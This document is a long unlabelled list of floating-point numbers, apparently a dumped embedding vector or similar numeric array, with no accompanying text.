0.017917677760124207, -0.0024894403759390116, 0.03627582639455795, 0.04999331012368202, 0.05247882008552551, 0.02295161783695221, 0.027891170233488083, -0.020765000954270363, 0.004774376749992371, -0.004038949962705374, 0.0015829380135983229, -0.06651092320680618, -0.01485012099146843, -0.0007590237073600292, 0.00876220129430294, 0.0044243610464036465, 0.002341961720958352, -0.013701753690838814, 0.01128703635185957, -0.03121042437851429, 0.020765000954270363, 0.007216623984277248, -0.04451890289783478, -0.039013031870126724, -0.009651006199419498, -0.0017087864689528942, -0.03004632703959942, 0.018546920269727707, 0.011145456694066525, 0.010665658861398697, -0.005875551141798496, -0.009179074317216873, 0.04738195613026619, -0.037660159170627594, 0.01128703635185957, -0.009824047796428204, -0.027623742818832397, -0.03397909179329872, 0.054555319249629974, 0.014409651979804039, -0.03369593247771263, -0.003942597191780806, -0.03536342456936836, -0.018657037988305092, -0.04628078266978264, 0.015723194926977158, 0.0439525842666626, 0.01134996023029089, -0.03149358555674553, -0.005973870400339365, -0.007480119355022907, 0.010052148252725601, -0.006555919535458088, -0.005391821265220642, -0.029464276507496834, 0.04385819658637047, -0.01796487160027027, -0.032012708485126495, -0.055341873317956924, 0.006705364678055048, 0.0021571216639131308, 0.010319575667381287, 0.0009959727758541703, -0.011216246522963047, -0.03592974320054054, 0.00136761914473027, 0.013465788215398788, -0.007480119355022907, -0.015959160402417183, 0.020859386771917343, 0.02534273825585842, 0.027261927723884583, 0.0011316532036289573, 0.0026251208037137985, 0.08444433659315109, 0.004786175210028887, 0.038257941603660583, -0.03149358555674553, -0.01727270521223545, 0.00047930574510246515, 0.024540454149246216, 0.03511172905564308, -0.022935885936021805, -0.0022849366068840027, 0.02524835243821144, 0.013261284679174423, -0.0035276904236525297, -0.03325546160340309, 0.007853732444345951, 0.005006410181522369, -0.028866495937108994, -0.013481519185006618, -0.014645617455244064, -0.020230144262313843, 0.0017785930540412664, -0.011113994754850864, -0.018074989318847656, -0.015558019280433655, 0.008581293746829033, 0.021142546087503433, -0.010122938081622124, 0.027434969320893288, -0.026679879054427147, 0.030848611146211624, 0.04706733301281929, -0.012868007645010948, 0.01680077239871025, 0.03577243164181709, 0.0057497029192745686, -0.00003954272688133642, 0.0019270549528300762, 0.023376356810331345, -0.01260844524949789, 0.006009265314787626, -0.027214735746383667, -0.03646459802985191, -0.054366547614336014, 0.056568894535303116, -0.015738926827907562, -0.012120782397687435, 0.013096108101308346, -0.03127335011959076, -0.008298134431242943, -0.039547886699438095, -0.017603056505322456, -0.012317420914769173, 0.007259884383529425, -0.005206981208175421, -0.013166897930204868, -0.03429371118545532, 0.003714496735483408, -0.037030916661024094, -0.006941330619156361, -0.011798295192420483, -0.00735427113249898, -0.03161943331360817, 0.036873605102300644, -0.006984591018408537, 0.008313865400850773, -0.001300762058235705, -0.01686369627714157, -0.04259971156716347, -0.005014275666326284, -0.011554463766515255, 0.009918433614075184, -0.012199437245726585, -0.019679557532072067, -0.023596590384840965, 0.04700440913438797, 0.02622367814183235, 0.0442672036588192, 0.013041049242019653, -0.010335306636989117, -0.01645468920469284, 0.005553064402192831, 0.010209458880126476, -0.027324853464961052, -0.0020981302950531244, -0.02285723201930523, -0.03379032015800476, -0.04964722692966461, -0.0227628443390131, 0.019994178786873817, 0.014598424546420574, -0.002261339919641614, -0.026082098484039307, -0.004149067215621471, 0.023879749700427055, -0.008022841066122055, 0.01164885051548481, -0.02869345434010029, -0.004278848413378, -0.0035080264788120985, -0.00028414229745976627, -0.02298307977616787, 0.01097241509705782, 0.02954293228685856, -0.027875440195202827, -0.03300376608967781, 0.0016429126262664795, 0.0044558229856193066, 0.010374634526669979, 0.008486906997859478, 0.02257407270371914, -0.012144379317760468, -0.03243744745850563, 0.010476886294782162, 0.013961316086351871, 0.02131558768451214, -0.05046524479985237, -0.0063474830240011215, -0.01450403779745102, -0.006662104278802872, -0.005073267035186291, -0.027230465784668922, 0.02606636844575405, -0.03256329521536827, 0.0038993367925286293, 0.03205990046262741, -0.028819303959608078, 0.030156442895531654, -0.014448978938162327, 0.002788330428302288, -0.04606054723262787, -0.009517291560769081, 0.04716172069311142, -0.018609844148159027, -0.03372739255428314, 0.024540454149246216, 0.021205469965934753, 0.0023399952333420515, 0.019254818558692932, -0.006241298280656338, 0.02191336825489998, -0.036527521908283234, -0.018153643235564232, -0.018043527379631996, 0.003871807362884283, -0.030691299587488174, -0.02992047742009163, 0.013969182036817074, -0.016910890117287636, 0.001205392531119287, -0.016470421105623245, 0.011806161142885685, 0.007948118261992931, 0.02376963198184967, 0.0072126914747059345, -0.057921767234802246, 0.06651092320680618, -0.00002224470335931983, -0.03495441749691963, 0.010413962416350842, -0.04879774898290634, 0.00020241450692992657, -0.007940253242850304, -0.020466109737753868, -0.019663825631141663, -0.015093952417373657, 0.02188190631568432, 0.027120348066091537, 0.0012712663738057017, -0.02169313281774521, -0.02144143544137478, -0.04341772943735123, 0.03312961384654045, -0.001969332108274102, -0.009273460134863853, 0.022212257608771324, 0.011609522625803947, -0.017036739736795425, -0.007991379126906395, -0.03728261590003967, 0.024980925023555756, 0.008306000381708145, 0.01727270521223545, 0.014448978938162327, -0.019648095592856407, -0.00890378002077341, 0.02565735951066017, -0.02992047742009163, 0.02408425323665142, -0.0011896614450961351, 0.03007778897881508, -0.03026656061410904, 0.006815481930971146, -0.013662426732480526, 0.0039347317069768906, -0.016753580421209335, -0.0110668009147048, 0.026852920651435852, 0.017131125554442406, -0.04533691704273224, -0.023879749700427055, -0.003490329021587968, 0.00300659891217947, 0.007130103185772896, -0.0515034943819046, -0.019050315022468567, -0.005946340970695019, -0.00535249337553978, 0.01536924671381712, -0.005065401550382376, 0.02970024198293686, 0.015565884299576283, 0.0012348882155492902, 0.004660326987504959, -0.020009908825159073, -0.006123315542936325, 0.04785388708114624, -0.041246842592954636, 0.010822969488799572, -0.00030429771868512034, 0.0014915012288838625, 0.009776853956282139, -0.03419932723045349, -0.02137851156294346, -0.01164885051548481, -0.02257407270371914, -0.01856265217065811, 0.0033094219397753477, -0.010760045610368252, 0.01765025034546852, -0.010453290306031704, -0.020466109737753868, -0.004416495095938444, -0.0026329862885177135, -0.03253183513879776, -0.0113027673214674, -0.025327008217573166, 0.013969182036817074, -0.015723194926977158, 0.006127248052507639, -0.004349638242274523, -0.03243744745850563, 0.0029731704853475094, 0.014952373690903187, 0.025956250727176666, -0.018877273425459862, 0.02354939840734005, 0.038792796432971954, -0.002253474434837699, 0.008471176028251648, 0.039673734456300735, 0.014944507740437984, -0.007122237700968981, -0.005674980115145445, 0.016407497227191925, -0.007318876218050718, 0.010091475211083889, 0.03570950776338577, 0.017634518444538116, -0.007723950780928135, 0.01617152988910675, 0.015550153329968452, -0.026821458712220192, -0.009910568594932556, 0.027608010917901993, 0.037439923733472824, 0.014244475401937962, -0.000694624672178179, -0.01765025034546852, 0.017634518444538116, -0.057481296360492706, -0.0213470496237278, -0.012160110287368298, -0.010783642530441284, 0.03413640335202217, -0.02578320913016796, -0.037943318486213684, -0.013866930268704891, -0.0411209911108017, -0.00770035432651639, -0.026616955175995827, -0.02128412574529648, -0.007790807634592056, -0.004589537158608437, 0.022180795669555664, -0.005328896921128035, -0.009241998195648193, -0.020340261980891228, 0.01068925578147173, -0.05178665369749069, 0.014378189109265804, -0.010201592929661274, -0.004829435609281063, -0.013457922264933586, 0.006351415999233723, -0.026506837457418442, -0.01654907688498497, 0.0011454179184511304, 0.05011915788054466, -0.013261284679174423, 0.0007324775215238333, -0.00040827019256539643, 0.027623742818832397, 0.0002988901687785983, -0.013992778956890106, 0.02156728506088257, 0.029401352629065514, -0.03152504563331604, 0.02421010285615921, -0.013300611637532711, 0.0005913895438425243, 0.003209136426448822, -0.0110668009147048, 0.015227667056024075, 0.004805839154869318, -0.029873283579945564, 0.02345501072704792, 0.011389288119971752, 0.039233267307281494, 0.026255140081048012, -0.011806161142885685, 0.004845166578888893, 0.00849477294832468, -0.022589802742004395, -0.0037498916499316692, 0.005671047605574131, 0.027875440195202827, -0.040334440767765045, -0.012348882853984833, 0.02232237532734871, 0.007338539697229862, -0.00755090918391943, -0.016124337911605835, -0.010413962416350842, -0.005619921255856752, -0.02361232228577137, 0.003979958593845367, 0.009674602188169956, -0.014244475401937962, 0.03322400152683258, -0.00101661984808743, 0.04845166578888893, 0.023439280688762665, 0.023596590384840965, 0.01824803091585636, 0.024571916088461876, 0.0113027673214674, -0.013560174033045769, -0.00710257375612855, -0.025075310841202736, -0.019648095592856407, -0.03416786342859268, 0.005478342063724995, 0.0038541099056601524, 0.021677400916814804, 0.010311710648238659, 0.0025425327476114035, -0.012435403652489185, -0.004400764126330614, 0.013442191295325756, 0.025169696658849716, -0.026789996773004532, 0.024383144453167915, -0.013111839070916176, -0.024729227647185326, 0.027906902134418488, 0.009344249963760376, -0.027230465784668922, 0.007975648157298565, -0.009179074317216873, -0.020906580612063408, -0.040365900844335556, -0.037093840539455414, -0.009438636712729931, -0.019396398216485977, 0.04429866746068001, 0.025736015290021896, -0.04643809050321579, 0.000851443677674979, -0.007798673585057259, -0.019726749509572983, 0.01645468920469284, 0.007554842159152031, -0.038257941603660583, 0.03284645453095436, -0.00586375268176198, 0.0018395509105175734, -0.02106389030814171, 0.0012928965734317899, -0.01322195678949356, 0.0025975913740694523, -0.0188458114862442, 0.006394676398485899, 0.0251225046813488, -0.01793340966105461, 0.02647537551820278, 0.010626331903040409, -0.01103533897548914, -0.013072511181235313, -0.01286014262586832, -0.0012152245035395026, 0.0007659060065634549, -0.0240213293582201, -0.0004026168317068368, 0.016942352056503296, 0.013394998386502266, -0.013638829812407494, -0.0017923577688634396, 0.020969504490494728, -0.005521602462977171, -0.019663825631141663, -0.005659249145537615, 0.016785042360424995, 0.02565735951066017, -0.021645938977599144, 0.016085010021924973, -0.02166167087852955, 0.00032101196120493114, 0.006237365771085024, -0.0067840199917554855, -0.025547243654727936, -0.010217323899269104, -0.005619921255856752, 0.002983002457767725, 0.00032371573615819216, 0.014527634717524052, -0.003256329568102956, -0.0164861511439085, 0.022180795669555664, 0.002485507633537054, -0.00909255351871252, -0.011814027093350887, 0.014511903747916222, -0.0033113881945610046, 0.014236610382795334, 0.01881434954702854, 0.0009350149193778634, -0.0022908358369022608, -0.01859411410987377, -0.038604024797677994, -0.007004254963248968, 0.037597235292196274, 0.031163230538368225, 0.009415039792656898, -0.029102463275194168, 0.015652405098080635, 0.0056238542310893536, -0.01705246977508068, -0.007377867586910725, 0.03199697658419609, 0.040617600083351135, -0.008026774041354656, 0.013599501922726631, 0.02869345434010029, 0.004404697101563215, -0.014283803291618824, 0.011475808918476105, -0.0087936632335186, 0.009580216370522976, 0.008644217625260353, 0.008266672492027283, -0.000723628792911768, -0.008927376940846443, 0.02603490650653839, -0.0056238542310893536, 0.019317742437124252, 0.013418595306575298, -0.017288435250520706, 0.023219045251607895, -0.01765025034546852, 0.019821137189865112, 0.007303144782781601, 0.0023537599481642246, -0.0001007156606647186, 0.012207303196191788, 0.037030916661024094, -0.010374634526669979, 0.025264084339141846, 0.03322400152683258, -0.027214735746383667, -0.02919684909284115, -0.018688499927520752, 0.008408252149820328, -0.024697765707969666, 0.0069177341647446156, -0.01267136912792921, 0.027120348066091537, -0.008085764944553375, 0.02408425323665142, 0.027922632172703743, 0.008730738423764706, -0.013568039983510971, 0.024729227647185326, 0.007413262501358986, -0.0017333662835881114, -0.021897636353969574, 0.017445746809244156, -0.0009694266482256353, -0.022621264681220055, 0.04942699149250984, 0.011113994754850864, 0.03045533411204815, 0.012285958044230938, -0.00011804440873675048, -0.009847643785178661, -0.011129725724458694, -0.012899469584226608, -0.0215043593198061, -0.020214412361383438, 0.013646694831550121, -0.0246505718678236, 0.007012120448052883, -0.020686345174908638, 0.006728961132466793, -0.019915523007512093, -0.009666737169027328, -0.03309815376996994, -0.009698199108242989, -0.01505462545901537, -0.022747114300727844, -0.02147289738059044, 0.03114750050008297, -0.00822734460234642, -0.0017304166685789824, 0.019962716847658157, -0.010358903557062149, -0.010382500477135181, -0.004554142244160175, -0.007311010733246803, 0.014087164774537086, 0.009525157511234283, 0.0012142412597313523, -0.026789996773004532, -0.0011847454588860273, -0.038383789360523224, 0.012852276675403118, -0.006681768223643303, 0.0020765000954270363, -0.030282292515039444, 0.024634841829538345, 0.0012702831299975514, -0.0007491917931474745, -0.00774754723533988, -0.006524457596242428, 0.018751423805952072, 0.012812948785722256, -0.008018908090889454, 0.03633875027298927, -0.013001721352338791, -0.025924788787961006, -0.04344918951392174, -0.007377867586910725, -0.03228013589978218, 0.0131904948502779, 0.0036712363362312317, -0.005092930980026722, 0.005293502006679773, 0.025641629472374916, 0.013796140439808369, 0.01323768775910139, -0.007283481303602457, -0.02329770103096962, -0.009989223442971706, -0.020481841638684273, -0.011743237264454365, -0.04354357719421387, -0.011861220002174377, 0.004373234696686268, 0.02669561095535755, -0.019176162779331207, -0.014299534261226654, -0.005254174116998911, -0.0017412317683920264, -0.012136513367295265, -0.0003382177965249866, -0.01131849829107523, 0.003154077799990773, 0.01268710009753704, 0.013245552778244019, 0.004813704639673233, 0.02285723201930523, 0.019852599129080772, -0.04823143407702446, 0.009753257967531681, -0.008486906997859478, -0.007468320894986391, 0.03319253772497177, -0.00308132148347795, 0.004628864582628012, 0.007708219811320305, -0.028347371146082878, 0.01508608739823103, -0.028850765898823738, 0.03350716084241867, 0.00738573307171464, 0.019459322094917297, -0.008054303005337715, 0.027199003845453262, 0.03127335011959076, -0.0094229057431221, 0.01733562909066677, 0.020230144262313843, -0.03250037133693695, 0.016085010021924973, 0.02052903361618519, -0.012521924450993538, 0.021866174414753914, -0.019805405288934708, 0.017949139699339867, 0.007830135524272919, 0.020607689395546913, -0.016155799850821495, -0.0007639396353624761, -0.01196347177028656, -0.025704553350806236, -0.06430857628583908, 0.019994178786873817, -0.018987391144037247, -0.008329596370458603, 0.006135113537311554, 0.02518542855978012, 0.004223790019750595, 0.0011532834032550454, -0.009517291560769081, 0.023596590384840965, 0.026286602020263672, -0.003812815761193633, -0.013638829812407494, -0.013945585116744041, 0.013568039983510971, -0.025767477229237556, -0.010067879222333431, -0.006516592111438513, 0.006571650505065918, -0.024005599319934845, -0.01138142216950655, 0.018232299014925957, -0.016785042360424995, 0.020025640726089478, 0.013544443063437939, 0.011766833253204823, 0.016344571486115456, -0.014102895744144917, -0.004211991559714079, 0.025138234719634056, 0.0031442458275705576, -0.02499665506184101, -0.01101960800588131, -0.038824256509542465, -0.010901625268161297, 0.012993856333196163, 0.002772599458694458, 0.012183706276118755, -0.011090397834777832, -0.0008362042135559022, 0.006886271759867668, 0.02348647452890873, -0.028142867609858513, -0.024949463084340096, -0.01290733553469181, -0.002416684292256832, 0.019081776961684227, -0.0058873496018350124, 0.027340583503246307, 0.041530001908540726, 0.001710752840153873, 0.011011742986738682, 0.039705198258161545, 0.01262417621910572, -0.020717807114124298, -0.017603056505322456, 0.008156554773449898, -0.012844410724937916, -0.002418650547042489, 0.01510181836783886, -0.03042387217283249, -0.001777609926648438, 0.004373234696686268, -0.0057693663984537125, 0.003972092643380165, -0.016533344984054565, -0.014527634717524052, -0.003637807909399271, 0.03121042437851429, -0.005737904459238052, -0.007999244146049023, -0.005985668860375881, -0.039201803505420685, 0.0313991978764534, 0.03677922114729881, 0.00057221733732149, 0.009462232701480389, 0.0002974153612740338, -0.001455123070627451, 0.0004065496032126248, 0.013269149698317051, -0.005151922348886728, -0.007413262501358986, -0.009344249963760376, -0.019758211448788643, 0.020308800041675568, 0.03410493955016136, 0.002876817714422941, 0.014936641789972782, -0.03215428814291954, -0.00786553043872118, -0.018515458330512047, 0.014842255972325802, 0.03253183513879776, -0.002027340466156602, 0.007889127358794212, -0.025987712666392326, -0.01702100783586502, -0.012679235078394413, 0.007735749240964651, 0.013402863405644894, 0.0017304166685789824, 0.004908090922981501, 0.023753901943564415, -0.004086142871528864, -0.00017672863032203168, -0.02131558768451214, -0.009989223442971706, 0.01805925741791725, -0.018295222893357277, 0.0020922310650348663, -0.014842255972325802, -0.010288113728165627, -0.014645617455244064, -0.013457922264933586, -0.0018700298387557268, 0.0004938078345730901, 0.005364291835576296, -0.010225189849734306, -0.012396075762808323, -0.020922310650348663, -0.0032504303380846977, -0.0227628443390131, -0.016407497227191925, -0.020749269053339958, 0.018782885745167732, -0.040240053087472916, -0.007539110723882914, -0.0061980378814041615, 0.009839778766036034, 0.0005156838451512158, 0.08721300214529037, -0.014189416542649269, 0.009202670305967331, -0.024194370955228806, -0.04105806723237038, 0.004180529620498419, 0.005659249145537615, -0.011153321713209152, 0.02361232228577137, -0.01730416715145111, -0.004310310818254948, 0.019868329167366028, 0.0003357598325237632, 0.027387777343392372, 0.014071433804929256, 0.031761012971401215, -0.017980601638555527, -0.0116960434243083, 0.0104375584051013, 0.0013155100168660283, 0.013143301010131836, 0.01746147684752941, -0.01513328030705452, 0.026239410042762756, 0.020985234528779984, -0.006764356046915054, -0.0221336018294096, -0.014574827626347542, 0.016313109546899796, 0.0014462744584307075, 0.007157632615417242, -0.0036043792497366667, -0.015440036542713642, -0.00586375268176198, -0.019663825631141663, 0.012506193481385708, 0.019899791106581688, 0.006988523993641138, -0.018688499927520752, -0.028017019852995872, -0.010799373500049114, -0.013953451067209244, -0.010901625268161297, 0.0007059313356876373, -0.019821137189865112, -0.015801850706338882, -0.007495850324630737, 0.0006410407368093729, -0.009477963671088219, 0.008439714089035988, -0.0006710280431434512, -0.03177674114704132, -0.006091853138059378, -0.0013686022721230984, 0.0007162548718042672, -0.009328518994152546, -0.014008509926497936, -0.011538732796907425, 0.001245703431777656, -0.010366769507527351, 0.008471176028251648, 0.005277771037071943, 0.014960238710045815, 0.0056513836607337, -0.005537333432585001, -0.009297057054936886, -0.04920675978064537, -0.031949784606695175, -0.006555919535458088, 0.03004632703959942, 0.00583229074254632, -0.008290269412100315, 0.03221721202135086, -0.0026113560888916254, -0.020387453958392143, -0.02273138239979744, -0.009265595115721226, -0.013560174033045769, -0.022778576239943504, -0.004833368584513664, 0.0029259773436933756, 0.010413962416350842, -0.026019174605607986, 0.0030400275718420744, -0.005175518803298473, 0.014354593120515347, -0.02408425323665142, -0.017854753881692886, -0.02370670810341835, -0.020749269053339958, 0.002078466350212693, -0.035489272326231, 0.005541265942156315, -0.020167220383882523, -0.010138669051229954, 0.009116149507462978, -0.006382877938449383, 0.010555542074143887, -0.018735693767666817, 0.0013479553163051605, -0.008565562777221203, 0.0125612523406744, 0.01448830682784319, -0.005442947149276733, -0.017162587493658066, 0.01194774080067873, 0.03369593247771263, -0.020702075213193893, -0.020104296505451202, 0.01292306650429964, 0.006630642339587212, -0.013277015648782253, 0.005242376122623682, -0.019742481410503387, 0.010138669051229954, 0.0021728528663516045, -0.013253418728709221, -0.024666303768754005, -0.0076334974728524685, -0.0226055346429348, -0.019490784034132957, 0.014669214375317097, 0.002998733427375555, -0.031414929777383804, 0.011342095211148262, 0.01287587359547615, 0.05002477392554283, -0.014150089584290981, 0.02332916297018528, 0.0028355238027870655, 0.017949139699339867, 0.00758237112313509, 0.027246197685599327, -0.009289191104471684, 0.009257729165256023, 0.013772543519735336, 0.0066424403339624405, -0.0002121235302183777, -0.013465788215398788, 0.029653050005435944, -0.00909255351871252, 0.040177129209041595, -0.018546920269727707, 0.01480292808264494, 0.019097506999969482, -0.01683223433792591, -0.006367146968841553, 0.011231977492570877, 0.02163020893931389, 0.007920589298009872, 0.010555542074143887, -0.007326741702854633, -0.004908090922981501, 0.005942407995462418, 0.01547936350107193, -0.019726749509572983, 0.014102895744144917, -0.009792584925889969, -0.01286014262586832, 0.02490226924419403, -0.0059030805714428425, -0.013159031979739666, 0.003645673394203186, -0.03350716084241867, 0.010610600933432579, 0.007546976208686829, 0.009713930077850819, -0.017917677760124207, -0.01783902384340763, -0.0044400920160114765, 0.016100740060210228, -0.0012820814736187458, -0.010563407093286514, -0.01799633353948593, 0.02461910992860794, 0.015259128995239735, 0.022652728483080864, -0.02433595061302185, 0.026239410042762756, -0.01636030338704586, -0.017823291942477226, 0.004436159040778875, -0.008966704830527306, -0.000838170584756881, 0.0054665436036884785, 0.0026565829757601023, 0.007704286836087704, -0.014039971865713596, -0.025484317913651466, 0.018232299014925957, 0.01221516914665699, 0.01683223433792591, 0.004408629611134529, -0.0028119271155446768, 0.021236931905150414, -0.010366769507527351, 0.009320653975009918, -0.013394998386502266, 0.0032818925101310015, -0.02106389030814171, -0.008085764944553375, 0.01739855296909809, -0.00847904197871685, -0.015526557341217995, 0.0043063778430223465, -0.027639474719762802, -0.01139715313911438, -0.0003546862571965903, -0.012034261599183083, 0.01268710009753704, 0.006032861769199371, -0.01645468920469284, 0.0033408841118216515, -0.002104029292240739, 0.020182950422167778, 0.0048608980141580105, -0.00611545005813241, -0.012364613823592663, -0.0073660691268742085, -0.02144143544137478, 0.0014069468015804887, -0.01639176532626152, -0.007484052330255508, -0.003382178023457527, -0.01161738857626915, -0.007637429982423782, 0.017886215820908546, -0.01171177439391613, -0.0023517936933785677, 0.015676002949476242, -0.011058935895562172, -0.004027151502668858, 0.005411484744399786, 0.002035205950960517, 0.01323768775910139, -0.027434969320893288, 0.002636919030919671, 0.0017274671699851751, 0.00424738647416234, 0.008659948594868183, 0.0011395186884328723, 0.013528712093830109, -0.012993856333196163, 0.022810038179159164, 0.002432415261864662, -0.00032740269671194255, 0.025515779852867126, 0.04392112046480179, -0.013717484660446644, -0.011554463766515255, -0.017886215820908546, 0.01591983437538147, 0.017854753881692886, -0.0037557908799499273, 0.011161187663674355, -0.017225511372089386, -0.012647773139178753, -0.02358086034655571, 0.018798617646098137, -0.008738604374229908, 0.05074840039014816, 0.018232299014925957, -0.026050636544823647, 0.012883738614618778, 0.0006818431429564953, 0.011782564222812653, -0.01834241673350334, 0.004542343784123659, 0.001231938716955483, 0.0029417083133012056, -0.027057424187660217, 0.003639774164184928, -0.013945585116744041, -0.011027473956346512, 0.006414339877665043, -0.009289191104471684, 0.008109361864626408, -0.007480119355022907, -0.0054744090884923935, 0.001782525796443224, -0.014826525002717972, 0.01626591756939888, 0.01765025034546852, -0.03696799278259277, 0.03017217479646206, 0.0018837945535779, -0.027057424187660217, 0.010815104469656944, -0.007075044792145491, -0.007661026436835527, 0.00101661984808743, -0.007165498100221157, -0.008864453062415123, -0.005883416626602411, -0.00649299519136548, -0.0034038082230836153, -0.008636352606117725, 0.004986746236681938, 0.03174528107047081, -0.0023694909177720547, -0.005938475485891104, 0.013520847074687481, 0.013914123177528381, -0.019978446885943413, 0.004833368584513664, -0.014842255972325802, -0.020434647798538208, -0.013568039983510971, 0.016029950231313705, 0.012836545705795288, -0.015440036542713642, 0.009753257967531681, -0.010083610191941261, -0.0033487495966255665, -0.024446068331599236, 0.013111839070916176, -0.013316342607140541, -0.003818714991211891, -0.02118973806500435, -0.028882227838039398, 0.01297025941312313, -0.014999566599726677, -0.012411806732416153, 0.011703909374773502, -0.0033507158514112234, -0.010547676123678684, -0.019522245973348618, 0.006111517082899809, -0.0036279759369790554, 0.011153321713209152, -0.005128325894474983, 0.019585169851779938, 0.02345501072704792, -0.0017540132394060493, -0.0038600091356784105, -0.012081454508006573, 0.025610167533159256, -0.023942675441503525, -0.01138142216950655, 0.017980601638555527, -0.028677724301815033, 0.02647537551820278, -0.005132258404046297, -0.006158710457384586, -0.01623445563018322, -0.011153321713209152, 0.054492395371198654, -0.0030616577714681625, -0.006390743423253298, -0.02348647452890873, 0.0017048537265509367, -0.020607689395546913, -0.01739855296909809, -0.020623421296477318, 0.02238529920578003, 0.019726749509572983, 0.021236931905150414, 0.010681389831006527, 0.0035394886508584023, -0.041592925786972046, -0.004062546417117119, -0.013017453253269196, -0.03482856974005699, -0.0043968316167593, -0.009776853956282139, -0.027466431260108948, -0.0034451023675501347, 0.006709297653287649, -0.011837623082101345, 0.006551987025886774, 0.0010284180752933025, -0.020151488482952118, 0.016753580421209335, -0.006107584573328495, 0.004589537158608437, 0.015613078139722347, 0.019286280497908592, -0.026947306469082832, 0.010374634526669979, 0.026538299396634102, -0.02487080730497837, 0.005022141151130199, -0.013756812550127506, -0.013552309013903141, 0.01658053882420063, 0.00032101196120493114, -0.013347805477678776, -0.01601422019302845, -0.039422038942575455, -0.013890526257455349, 0.014582693576812744, 0.023659516125917435, 0.01780756004154682, 0.021331317722797394, -0.024446068331599236, 0.0029731704853475094, -0.01566813699901104, -0.00548620754852891, -0.006268827710300684, -0.01733562909066677, 0.009674602188169956, 0.002839456545189023, 0.0046013351529836655, 0.01809071935713291, 0.026837190613150597, -0.005958139430731535, -0.009147611446678638, -0.031823936849832535, 0.013819737359881401, -0.006276693195104599, 0.01654907688498497, 0.04473913833498955, -0.022841500118374825, -0.029653050005435944, -0.005478342063724995, 0.009603812359273434, 0.018483996391296387, 0.0296687800437212, 0.0044479575008153915, -0.004109739791601896, 0.017288435250520706, -0.003893437562510371, 0.016376033425331116, 0.003924899734556675, 0.005297434516251087, -0.014087164774537086, -0.003358581569045782, -0.0021453234367072582, -0.02988901548087597, 0.03190259262919426, -0.021016696467995644, 0.00851050391793251, 0.013347805477678776, 0.002711641602218151, 0.005737904459238052, -0.019994178786873817, 0.012333151884377003, -0.0017087864689528942, -0.024446068331599236, 0.014102895744144917, 0.016847966238856316, -0.004160865675657988, 0.0016094841994345188, 0.012647773139178753, -0.002147289691492915, 0.0007909773848950863, -0.009234132245182991, -0.009863374754786491, -0.009603812359273434, -0.018043527379631996, 0.02603490650653839, -0.000287337665213272, 0.013969182036817074, 0.0067682890221476555, -0.010115072131156921, -0.0005397720378823578, -0.009297057054936886, 0.01595129631459713, 0.012238765135407448, 0.003956361673772335, 0.011428616009652615, -0.014008509926497936, 0.009391442872583866, 0.005922744516283274, 0.013253418728709221, -0.011169053614139557, -0.01196347177028656, 0.0038383789360523224, -0.02310892753303051, -0.012466865591704845, 0.02235383726656437, -0.019443592056632042, -0.0027765322010964155, -0.0028905824292451143, 0.008361059240996838, 0.002902380656450987, 0.0033330183941870928, -0.009847643785178661, 0.0060367947444319725, 0.0015603245701640844, 0.006681768223643303, 0.00614691199734807, -0.017068201676011086, -0.013788274489343166, -0.024729227647185326, 0.018137913197278976, 0.0033133546821773052, -0.002239709720015526, 0.007727883756160736, -0.017115393653512, 0.017540132626891136, 0.006536255590617657, 0.0038973703049123287, 0.024603379890322685, 0.012301689945161343, -0.005836223717778921, 0.007016052957624197, 0.015707464888691902, 0.00915547739714384, 0.029244042932987213, -0.021048160269856453, -0.014087164774537086, -0.001942786038853228, 0.0030478930566459894, 0.015290590934455395, -0.007661026436835527, -0.012128647416830063, 0.004880561493337154, 0.004978880751878023, -0.0024068523198366165, 0.019616633653640747, 0.0027608012314885855, 0.004054680932313204, 0.0076570939272642136, -0.0013194427592679858, -0.004267050419002771, 0.002190550323575735, -0.002908279886469245, 0.016376033425331116, -0.008801528252661228, -0.004935620352625847, -0.005273838061839342, 0.020450379699468613, -0.0043142433278262615, -0.013914123177528381, 0.003291724482551217, 0.013127570040524006, 0.00020241450692992657, -0.0036948327906429768, -0.04691002145409584, -0.0015878539998084307, -0.002275104634463787, -0.006603112909942865, -0.007448657415807247, 0.004660326987504959, 0.0005201082094572484, 0.02295161783695221, 0.0010972415329888463, 0.02295161783695221, 0.0014669214142486453, 0.004813704639673233, -0.010665658861398697, -0.019852599129080772, 0.005643518175929785, 0.01717831753194332, 0.010185861960053444, 0.013701753690838814, 0.0022180795203894377, 0.010484752245247364, 0.01790194772183895, 0.004188395105302334, 0.003030195599421859, 0.003836412448436022, 0.0006670953007414937, 0.003189472481608391, -0.009359980933368206, 0.00023596591199748218, 0.01108253188431263, 0.007031784392893314, 0.002971203997731209, -0.004377167671918869, 0.020922310650348663, 0.006744692102074623, 0.0030498593114316463, -0.006268827710300684, 0.007613833528012037, -0.0042985123582184315, -0.020198682323098183, -0.0004903666558675468, -0.009540888480842113, 0.009375711902976036, -0.005678913090378046, -0.0051794517785310745, -0.002341961720958352, -0.011814027093350887, 0.003533589420840144, -0.000665128929540515, 0.0017766266828402877, 0.01881434954702854, -0.02395840547978878, 0.00611545005813241, 0.004624932073056698, -0.014826525002717972, 0.00551766948774457, -0.0246505718678236, -0.011113994754850864, 0.000018250488210469484, 0.0038324797060340643, 0.005930610001087189, -0.005792963318526745, 0.003315321169793606, 0.0036909000482410192, -0.014047836884856224, 0.015204070135951042, -0.027718128636479378, 0.00520304823294282, -0.023407818749547005, -0.02907099947333336, -0.0016556940972805023, 0.005006410181522369, 0.0037479251623153687, 0.010351037606596947, 0.018704231828451157, 0.0021807183511555195, 0.011145456694066525, 0.004829435609281063, 0.0037026985082775354, -0.004239520989358425, 0.00611545005813241, -0.00854196585714817, -0.004699654411524534, 0.007460455410182476, 0.01138142216950655, 0.0073896655812859535, -0.005092930980026722, 0.0024481462314724922, -0.008880184032022953, -0.0020293069537729025, -0.020151488482952118, -0.01289160456508398, -0.002035205950960517, 0.0019653993658721447, 0.01739855296909809, -0.00008037588850129396, -0.010610600933432579, -0.007484052330255508, -0.011955605819821358, -0.0044479575008153915, 0.005973870400339365, 0.02672707289457321, -0.009635274298489094, -0.0011454179184511304, -0.015392842702567577, -0.009249864146113396, 0.0023321297485381365, 0.017571594566106796, -0.01508608739823103, 0.022401031106710434, -0.020733539015054703, 0.0009930231608450413, -0.007016052957624197, 0.0008863469702191651, 0.0017422150122001767, -0.01670638658106327, -0.010233054868876934, -0.0013027284294366837, 0.0024225832894444466, 0.020481841638684273, 0.009430770762264729, 0.039988357573747635, 0.000380495039280504, 0.026333795860409737, -0.010799373500049114, -0.01447257585823536, 0.0188458114862442, -0.007149767130613327, -0.010256651788949966, 0.004204126074910164, 0.002088298322632909, 0.0014423415996134281, -0.004149067215621471, 